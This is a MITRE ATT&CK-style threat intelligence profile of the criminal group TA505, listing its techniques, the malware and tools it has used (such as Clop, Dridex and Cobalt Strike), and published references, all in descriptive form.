Skip to content

G0092 TA505

TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.45671

Item Value
ID G0092
Associated Names Hive0065, Spandex Tempest, CHIMBORAZO
Version 3.0
Created 28 May 2019
Last Modified 10 April 2024
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
Hive0065 2
Spandex Tempest 3
CHIMBORAZO 3

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.003 Email Account TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.8
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains TA505 has registered domains to impersonate services such as Dropbox to distribute malware.1
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols TA505 has used HTTP to communicate with C2 nodes.2
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell TA505 has used PowerShell to download and execute malware and reconnaissance scripts.4121011
enterprise T1059.003 Windows Command Shell TA505 has executed commands using cmd.exe.8
enterprise T1059.005 Visual Basic TA505 has used VBS for code execution.4582
enterprise T1059.007 JavaScript TA505 has used JavaScript for code execution.45
enterprise T1555 Credentials from Password Stores -
enterprise T1555.003 Credentials from Web Browsers TA505 has used malware to gather credentials from Internet Explorer.4
enterprise T1486 Data Encrypted for Impact TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.4
enterprise T1140 Deobfuscate/Decode Files or Information TA505 has decrypted packed DLLs with an XOR key.7
enterprise T1568 Dynamic Resolution -
enterprise T1568.001 Fast Flux DNS TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.8
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools TA505 has used malware to disable Windows Defender.1
enterprise T1105 Ingress Tool Transfer TA505 has downloaded additional malware to execute on victim systems.101112
enterprise T1559 Inter-Process Communication -
enterprise T1559.002 Dynamic Data Exchange TA505 has leveraged malicious Word documents that abused DDE.5
enterprise T1112 Modify Registry TA505 has used malware to disable Windows Defender through modification of the Registry.1
enterprise T1106 Native API TA505 has deployed payloads that use Windows API calls on a compromised host.1
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing TA505 has used UPX to obscure malicious code.2
enterprise T1027.010 Command Obfuscation TA505 has used base64 encoded PowerShell commands.1011
enterprise T1027.013 Encrypted/Encoded File TA505 has password-protected malicious Word documents.4
enterprise T1588 Obtain Capabilities -
enterprise T1588.001 Malware TA505 has used malware such as Azorult and Cobalt Strike in their operations.7
enterprise T1588.002 Tool TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.7
enterprise T1069 Permission Groups Discovery TA505 has used TinyMet to enumerate members of privileged groups.2 TA505 has also run net group /domain.8
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment TA505 has used spearphishing emails with malicious attachments to initially compromise victims.4561012138142
enterprise T1566.002 Spearphishing Link TA505 has sent spearphishing emails containing malicious links.46814
enterprise T1055 Process Injection -
enterprise T1055.001 Dynamic-link Library Injection TA505 has been seen injecting a DLL into winword.exe.2
enterprise T1608 Stage Capabilities -
enterprise T1608.001 Upload Malware TA505 has staged malware on actor-controlled domains.1
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing TA505 has signed payloads with code signing certificates from Thawte and Sectigo.10118
enterprise T1553.005 Mark-of-the-Web Bypass TA505 has used .iso files to deploy malicious .lnk files.9
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.007 Msiexec TA505 has used msiexec to download and execute malicious Windows Installer files.10118
enterprise T1218.011 Rundll32 TA505 has leveraged rundll32.exe to execute malicious DLLs.1011
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files TA505 has used malware to gather credentials from FTP clients and Outlook.4
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. 456101213814
enterprise T1204.002 Malicious File TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. 4561012138142
enterprise T1078 Valid Accounts -
enterprise T1078.002 Domain Accounts TA505 has used stolen domain admin accounts to compromise additional hosts.2

Software

ID Name References Techniques
S0552 AdFind 7 Domain Account:Account Discovery Domain Trust Discovery Domain Groups:Permission Groups Discovery Remote System Discovery System Network Configuration Discovery
S1025 Amadey 117 Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Data from Local System Deobfuscate/Decode Files or Information Fast Flux DNS:Dynamic Resolution Exfiltration Over C2 Channel File and Directory Discovery Ingress Tool Transfer Modify Registry Native API Obfuscated Files or Information Security Software Discovery:Software Discovery Mark-of-the-Web Bypass:Subvert Trust Controls System Information Discovery System Location Discovery System Network Configuration Discovery System Owner/User Discovery
S0344 Azorult 7 Create Process with Token:Access Token Manipulation Credentials from Web Browsers:Credentials from Password Stores Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel File and Directory Discovery File Deletion:Indicator Removal Ingress Tool Transfer Process Discovery Process Hollowing:Process Injection Query Registry Screen Capture System Information Discovery System Network Configuration Discovery System Owner/User Discovery System Time Discovery Credentials In Files:Unsecured Credentials
S0521 BloodHound 7 Domain Account:Account Discovery Local Account:Account Discovery Archive Collected Data PowerShell:Command and Scripting Interpreter Domain Trust Discovery Group Policy Discovery Native API Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery Remote System Discovery System Owner/User Discovery
S0611 Clop 1516 Windows Command Shell:Command and Scripting Interpreter Data Encrypted for Impact Deobfuscate/Decode Files or Information File and Directory Discovery Disable or Modify Tools:Impair Defenses Inhibit System Recovery Modify Registry Native API Network Share Discovery Software Packing:Obfuscated Files or Information Process Discovery Service Stop Security Software Discovery:Software Discovery Code Signing:Subvert Trust Controls Msiexec:System Binary Proxy Execution System Language Discovery:System Location Discovery Time Based Checks:Virtualization/Sandbox Evasion
S0154 Cobalt Strike 7 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Parent PID Spoofing:Access Token Manipulation Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Domain Account:Account Discovery DNS:Application Layer Protocol Web Protocols:Application Layer Protocol File Transfer Protocols:Application Layer Protocol BITS Jobs Browser Session Hijacking JavaScript:Command and Scripting Interpreter Visual Basic:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Python:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol or Service Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup LSASS Memory:OS Credential Dumping Security Account Manager:OS Credential Dumping Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery Process Discovery Dynamic-link Library Injection:Process Injection Process Hollowing:Process Injection Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Remote Desktop Protocol:Remote Services SSH:Remote Services Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S0384 Dridex 452 Web Protocols:Application Layer Protocol Browser Session Hijacking Symmetric Cryptography:Encrypted Channel Asymmetric Cryptography:Encrypted Channel DLL:Hijack Execution Flow Native API Obfuscated Files or Information Proxy Multi-hop Proxy:Proxy Remote Access Tools Scheduled Task:Scheduled Task/Job Software Discovery Regsvr32:System Binary Proxy Execution System Information Discovery Malicious File:User Execution
S0381 FlawedAmmyy 13814 Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Clipboard Data Windows Command Shell:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Data from Local System Data Obfuscation Symmetric Cryptography:Encrypted Channel Exfiltration Over C2 Channel File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Input Capture Peripheral Device Discovery Local Groups:Permission Groups Discovery Screen Capture Security Software Discovery:Software Discovery Rundll32:System Binary Proxy Execution Msiexec:System Binary Proxy Execution System Information Discovery System Owner/User Discovery Windows Management Instrumentation
S0383 FlawedGrace 6814 Encrypted/Encoded File:Obfuscated Files or Information
S0460 Get2 14 Web Protocols:Application Layer Protocol Command and Scripting Interpreter Process Discovery Dynamic-link Library Injection:Process Injection System Information Discovery System Owner/User Discovery
S0002 Mimikatz 7 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Golden Ticket:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Pass the Ticket:Use Alternate Authentication Material
S0039 Net 8 Domain Account:Account Discovery Local Account:Account Discovery Additional Local or Domain Groups:Account Manipulation Local Account:Create Account Domain Account:Create Account Network Share Connection Removal:Indicator Removal Network Share Discovery Password Policy Discovery Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery SMB/Windows Admin Shares:Remote Services Remote System Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services System Time Discovery
S0194 PowerSploit 7 Access Token Manipulation Local Account:Account Discovery Audio Capture Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Security Support Provider:Boot or Logon Autostart Execution PowerShell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Windows Credential Manager:Credentials from Password Stores Data from Local System Domain Trust Discovery Path Interception by PATH Environment Variable:Hijack Execution Flow Path Interception by Unquoted Path:Hijack Execution Flow DLL:Hijack Execution Flow Path Interception by Search Order Hijacking:Hijack Execution Flow Keylogging:Input Capture Indicator Removal from Tools:Obfuscated Files or Information Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Dynamic-link Library Injection:Process Injection Query Registry Reflective Code Loading Scheduled Task:Scheduled Task/Job Screen Capture Kerberoasting:Steal or Forge Kerberos Tickets Credentials in Registry:Unsecured Credentials Group Policy Preferences:Unsecured Credentials Windows Management Instrumentation
S0461 SDBbot 142 Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Data from Local System Deobfuscate/Decode Files or Information Application Shimming:Event Triggered Execution Image File Execution Options Injection:Event Triggered Execution Exfiltration Over C2 Channel File and Directory Discovery Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Non-Application Layer Protocol Software Packing:Obfuscated Files or Information Obfuscated Files or Information Process Discovery Dynamic-link Library Injection:Process Injection Proxy Remote Desktop Protocol:Remote Services Rundll32:System Binary Proxy Execution System Information Discovery System Location Discovery System Network Configuration Discovery System Owner/User Discovery Video Capture
S0382 ServHelper 610118 Additional Local or Domain Groups:Account Manipulation Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Local Account:Create Account Asymmetric Cryptography:Encrypted Channel File Deletion:Indicator Removal Ingress Tool Transfer Masquerade Account Name:Masquerading Remote Desktop Protocol:Remote Services Scheduled Task:Scheduled Task/Job Rundll32:System Binary Proxy Execution System Information Discovery System Owner/User Discovery
S0266 TrickBot 42 Local Account:Account Discovery Email Account:Account Discovery Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Browser Session Hijacking Credential Stuffing:Brute Force PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Password Managers:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores Standard Encoding:Data Encoding Data from Local System Deobfuscate/Decode Files or Information Domain Trust Discovery Symmetric Cryptography:Encrypted Channel Exfiltration Over C2 Channel Exploitation of Remote Services Fallback Channels File and Directory Discovery Firmware Corruption Hidden Window:Hide Artifacts Disable or Modify Tools:Impair Defenses Ingress Tool Transfer Credential API Hooking:Input Capture Component Object Model:Inter-Process Communication Masquerading Modify Registry Native API Network Share Discovery Non-Standard Port Obfuscated Files or Information Software Packing:Obfuscated Files or Information Encrypted/Encoded File:Obfuscated Files or Information Permission Groups Discovery Spearphishing Link:Phishing Spearphishing Attachment:Phishing Bootkit:Pre-OS Boot Process Discovery Process Injection Process Hollowing:Process Injection External Proxy:Proxy Remote Access Tools VNC:Remote Services Remote System Discovery Scheduled Task:Scheduled Task/Job Code Signing:Subvert Trust Controls System Information Discovery System Network Configuration Discovery System Owner/User Discovery System Service Discovery Credentials In Files:Unsecured Credentials Credentials in Registry:Unsecured Credentials Malicious File:User Execution Time Based Checks:Virtualization/Sandbox Evasion

References

  1. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. 

  2. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. 

  3. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023. 

  4. Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. 

  5. Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019. 

  6. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019. 

  7. Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022. 

  8. Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020. 

  9. Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021. 

  10. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019. 

  11. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved September 16, 2024.. 

  12. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019. 

  13. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019. 

  14. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. 

  15. Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021. 

  16. Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021. 

  17. Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.